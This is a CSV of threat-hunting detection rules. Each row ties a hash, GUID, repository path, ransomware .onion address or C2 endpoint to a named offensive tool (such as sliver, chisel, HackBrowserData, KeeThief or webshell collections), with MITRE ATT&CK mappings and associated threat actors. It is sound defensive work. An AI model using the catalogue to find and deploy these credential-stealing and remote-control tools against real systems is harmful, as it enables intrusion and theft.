"*3f7216ab8b49c48f550b68c1e5b8d55f10ff60506090ff19e8b6654186b7bf5c*",".{0,1000}3f7216ab8b49c48f550b68c1e5b8d55f10ff60506090ff19e8b6654186b7bf5c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25239"
"*3f731e2fb08a9113084dcbffa31890d2b42c817f8ae6da445502130b7e5f512b*",".{0,1000}3f731e2fb08a9113084dcbffa31890d2b42c817f8ae6da445502130b7e5f512b.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","25240"
"*3f79ab9728d5e9501fe4e9d744aa42f755f2f085c3edd087747c88b8b1bb31cb*",".{0,1000}3f79ab9728d5e9501fe4e9d744aa42f755f2f085c3edd087747c88b8b1bb31cb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25242"
"*3f7d06db3e6284ecccd59011f4a1c59c3cbf61804152948f54df02da5400f194*",".{0,1000}3f7d06db3e6284ecccd59011f4a1c59c3cbf61804152948f54df02da5400f194.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25243"
"*3f890ba7237462ed2d3fdfc82d5c6b67ae06fdc134d3a174a2e0b1c7b931204e*",".{0,1000}3f890ba7237462ed2d3fdfc82d5c6b67ae06fdc134d3a174a2e0b1c7b931204e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25244"
"*3f8db721f5791fcaaef7d22b50a1cd6a87be8f07262c145ad66a18f832d75839*",".{0,1000}3f8db721f5791fcaaef7d22b50a1cd6a87be8f07262c145ad66a18f832d75839.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#filehash","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","25245"
"*3f8db76e847878adee99ebbd0bb4399d65839f8eeb47506df23a1e10f2bd63b4*",".{0,1000}3f8db76e847878adee99ebbd0bb4399d65839f8eeb47506df23a1e10f2bd63b4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25246"
"*3f9462dec07f9859ce437efe0a77ed335b07a47d2ce33b6bed3153aa3a1512d4*",".{0,1000}3f9462dec07f9859ce437efe0a77ed335b07a47d2ce33b6bed3153aa3a1512d4.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","25247"
"*3f97c1116190ffd5984c92985bd12e0c92a044ca760cbb110ba9fe65a2703de4*",".{0,1000}3f97c1116190ffd5984c92985bd12e0c92a044ca760cbb110ba9fe65a2703de4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25249"
"*3f9957546691a7b74cb1670cb39df0a00d0e6b8e55d6a049278ce97637b2e689*",".{0,1000}3f9957546691a7b74cb1670cb39df0a00d0e6b8e55d6a049278ce97637b2e689.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25250"
"*3fabdbc17823053cc58c6cea393a110a136a3d8687d61239b6f167db573ecc08*",".{0,1000}3fabdbc17823053cc58c6cea393a110a136a3d8687d61239b6f167db573ecc08.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","25252"
"*3fad659152d3559e2630e9e1a0e7d4c6770cfdd2e847ac6d438d852af77e591e*",".{0,1000}3fad659152d3559e2630e9e1a0e7d4c6770cfdd2e847ac6d438d852af77e591e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25253"
"*3fb111c19e638174ed630c9a9d8d999c1bf62d2308a8284fedad1efab45a7f96*",".{0,1000}3fb111c19e638174ed630c9a9d8d999c1bf62d2308a8284fedad1efab45a7f96.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","25256"
"*3FBBC3DD-39D9-4D8C-AF73-EDC3D2849DEB*",".{0,1000}3FBBC3DD\-39D9\-4D8C\-AF73\-EDC3D2849DEB.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","25258"
"*3fbcc1db198e03bc5d6087c69e311fd97fe9861a7721526e9ea1d44e2398d022*",".{0,1000}3fbcc1db198e03bc5d6087c69e311fd97fe9861a7721526e9ea1d44e2398d022.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","25259"
"*3fbde1d2887f69fa6f96aef04c2c7924e1a439cfadf44990620d0a2fb4a4db84*",".{0,1000}3fbde1d2887f69fa6f96aef04c2c7924e1a439cfadf44990620d0a2fb4a4db84.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","25260"
"*3fc18c828c43a82a86b2aa19b1248d469fa882466818b85692bcb15c46369006*",".{0,1000}3fc18c828c43a82a86b2aa19b1248d469fa882466818b85692bcb15c46369006.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","25261"
"*3fc8aac43db6c83112f9bc168ae5a32f1cdd942376941341c621fa36bff26647*",".{0,1000}3fc8aac43db6c83112f9bc168ae5a32f1cdd942376941341c621fa36bff26647.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","25262"
"*3FCA8012-3BAD-41E4-91F4-534AA9A44F96*",".{0,1000}3FCA8012\-3BAD\-41E4\-91F4\-534AA9A44F96.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#GUIDproject","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","25263"
"*3fcec932530557ea3d1f38f06f477db4b0be5acb*",".{0,1000}3fcec932530557ea3d1f38f06f477db4b0be5acb.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","25264"
"*3fd21b20d00000021c43d21b21b43d41226dd5dfc615dd4a96265559485910*",".{0,1000}3fd21b20d00000021c43d21b21b43d41226dd5dfc615dd4a96265559485910.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25266"
"*3fd21b20d00000021c43d21b21b43de0a012c76cf078b8d06f4620c2286f5e*",".{0,1000}3fd21b20d00000021c43d21b21b43de0a012c76cf078b8d06f4620c2286f5e.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","25267"
"*3fd3c053edac4964627552e89cd2c46b31d0644d255986dfd3a4823ede742e06*",".{0,1000}3fd3c053edac4964627552e89cd2c46b31d0644d255986dfd3a4823ede742e06.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","25268"
"*3fe1b764b88336a034bff6db6532c2bc1e389680c54d38b32f2af8322ef1cfcf*",".{0,1000}3fe1b764b88336a034bff6db6532c2bc1e389680c54d38b32f2af8322ef1cfcf.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25270"
"*3gstudent.github.io/Windows-Event-Viewer-Log-*",".{0,1000}3gstudent\.github\.io\/Windows\-Event\-Viewer\-Log\-.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","1","N/A","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","25275"
"*3gstudent/CLR-Injection*",".{0,1000}3gstudent\/CLR\-Injection.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","1","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","25276"
"*3gstudent/COM-Object-hijacking*",".{0,1000}3gstudent\/COM\-Object\-hijacking.{0,1000}","offensive_tool_keyword","COM-Object-hijacking","use COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)","T1546.015","TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/COM-Object-hijacking","1","1","N/A","N/A","8","1","58","30","2017-08-04T09:19:40Z","2017-08-04T08:15:36Z","25277"
"*3gstudent/Eventlogedit-evt--General*",".{0,1000}3gstudent\/Eventlogedit\-evt\-\-General.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","1","N/A","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","25278"
"*3gstudent/Eventlogedit-evtx--Evolution*",".{0,1000}3gstudent\/Eventlogedit\-evtx\-\-Evolution.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","1","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","25279"
"*3gstudent/Office-Persistence*",".{0,1000}3gstudent\/Office\-Persistence.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","1","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z","25280"
"*3gstudent/Smbtouch-Scanner*",".{0,1000}3gstudent\/Smbtouch\-Scanner.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","1","N/A","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","25281"
"*3gstudent/Waitfor-Persistence*",".{0,1000}3gstudent\/Waitfor\-Persistence.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","1","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z","25282"
"*3kom-superhack.txt*",".{0,1000}3kom\-superhack\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","25283"
"*3ndG4me/AutoBlue-MS17-010*",".{0,1000}3ndG4me\/AutoBlue\-MS17\-010.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","1","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","25284"
"*3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion*",".{0,1000}3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","25285"
"*3pktcrcbmssvrnwe5skburdwe2h3v6ibdnn5kbjqihsg6eu6s6b7ryqd.onion*",".{0,1000}3pktcrcbmssvrnwe5skburdwe2h3v6ibdnn5kbjqihsg6eu6s6b7ryqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","25286"
"*3r7zqtidvujbmfhx52sb34u4vwkh66baefmqzlbqpcnwm3krzipy37yd.onion*",".{0,1000}3r7zqtidvujbmfhx52sb34u4vwkh66baefmqzlbqpcnwm3krzipy37yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","25295"
"*3snake-master*",".{0,1000}3snake\-master.{0,1000}","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","N/A","7","8","752","109","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z","25296"
"*3wugtklp46ufx7dnr6j5cd6ate7wnvnivsyvwuni7hqcqt7hm5r72nid.onion*",".{0,1000}3wugtklp46ufx7dnr6j5cd6ate7wnvnivsyvwuni7hqcqt7hm5r72nid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","25297"
"*3x55o3u2b7cjs54eifja5m3ottxntlubhjzt6k6htp5nrocjmsxxh7ad.onion*",".{0,1000}3x55o3u2b7cjs54eifja5m3ottxntlubhjzt6k6htp5nrocjmsxxh7ad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","25298"
"*3xpl01tc0d3r/ProcessInjection*",".{0,1000}3xpl01tc0d3r\/ProcessInjection.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","25299"
"*3xploitGuy/pastehakk*",".{0,1000}3xploitGuy\/pastehakk.{0,1000}","offensive_tool_keyword","pastehakk","perform clipboard poisoning or paste jacking attack","T1115","T0001 - T0002 - T0005","N/A","N/A","Phishing","https://github.com/3xploitGuy/pastehakk","1","1","N/A","N/A","7","1","56","10","2020-06-22T01:17:53Z","2020-06-17T19:32:24Z","25300"
"*3ytm3d25hfzvbylkxiwyqmpvzys5of7l4pbosm7ol7czlkplgukjq6yd.onion*",".{0,1000}3ytm3d25hfzvbylkxiwyqmpvzys5of7l4pbosm7ol7czlkplgukjq6yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","25301"
"*4.5.6.7:1337*",".{0,1000}4\.5\.6\.7\:1337.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","25302"
"*40056/service-endpoint*",".{0,1000}40056\/service\-endpoint.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","25304"
"*400b16a02c12bc59f8002db251638d4450c5736721904440bd1af274587b197c*",".{0,1000}400b16a02c12bc59f8002db251638d4450c5736721904440bd1af274587b197c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25305"
"*401ab31450e32d265a189983c56a0f7f947b15fe3559c08773275f6c1e6625ce*",".{0,1000}401ab31450e32d265a189983c56a0f7f947b15fe3559c08773275f6c1e6625ce.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","#filehash","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","25309"
"*401e82b43a6ac88e204d178b6ffcb43dc33d13ce40b26739c5302030154469af*",".{0,1000}401e82b43a6ac88e204d178b6ffcb43dc33d13ce40b26739c5302030154469af.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25310"
"*402e331588a371ded43b86c96e5d4424d59ad080094401b8c4fc87bb3b26905b*",".{0,1000}402e331588a371ded43b86c96e5d4424d59ad080094401b8c4fc87bb3b26905b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25312"
"*402ea71c95ba45c95e58a17cf0903b78ddc4238afb79df1d9ab188d203b77d43*",".{0,1000}402ea71c95ba45c95e58a17cf0903b78ddc4238afb79df1d9ab188d203b77d43.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","25313"
"*40365cfc8131302172edbbf08c64f014f8dec760d487e8fe9bbf17141048a7c7*",".{0,1000}40365cfc8131302172edbbf08c64f014f8dec760d487e8fe9bbf17141048a7c7.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25314"
"*403b4508661f4fe6473ee1e56dce4ed39f563ab0cfcdd74c3d1eceb86cab62a1*",".{0,1000}403b4508661f4fe6473ee1e56dce4ed39f563ab0cfcdd74c3d1eceb86cab62a1.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","25315"
"*40408670ce1d814a3283a625566334fa191580622adbd23effa6e3cdaaafc5d5*",".{0,1000}40408670ce1d814a3283a625566334fa191580622adbd23effa6e3cdaaafc5d5.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","#filehash","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","25317"
